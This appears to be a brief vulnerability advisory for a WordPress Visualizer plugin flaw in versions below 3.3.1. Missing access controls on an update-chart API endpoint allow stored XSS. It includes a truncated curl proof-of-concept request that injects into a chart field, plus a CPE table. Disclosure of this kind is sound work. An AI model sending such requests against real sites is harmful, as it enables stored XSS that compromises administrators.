By abusing a lack of access controls on the /wp-json/visualizer/v1/update-chart WP-JSON API endpoint, an attacker can arbitrarily modify meta data of an existing chart, and inject a XSS payload to be stored and later executed when an admin goes to edit the chart.
curl -i -s -k -X $‘POST’ \ -H $‘Host: 192.168.158.128:8000’ -H $‘Content-Type: application/json’ \ --data-binary $'{"id": 7, "visualizer-chart-type": "\\">
CPE | Name | Operator | Version |
---|---|---|---|
visualizer | lt | 3.3.1 |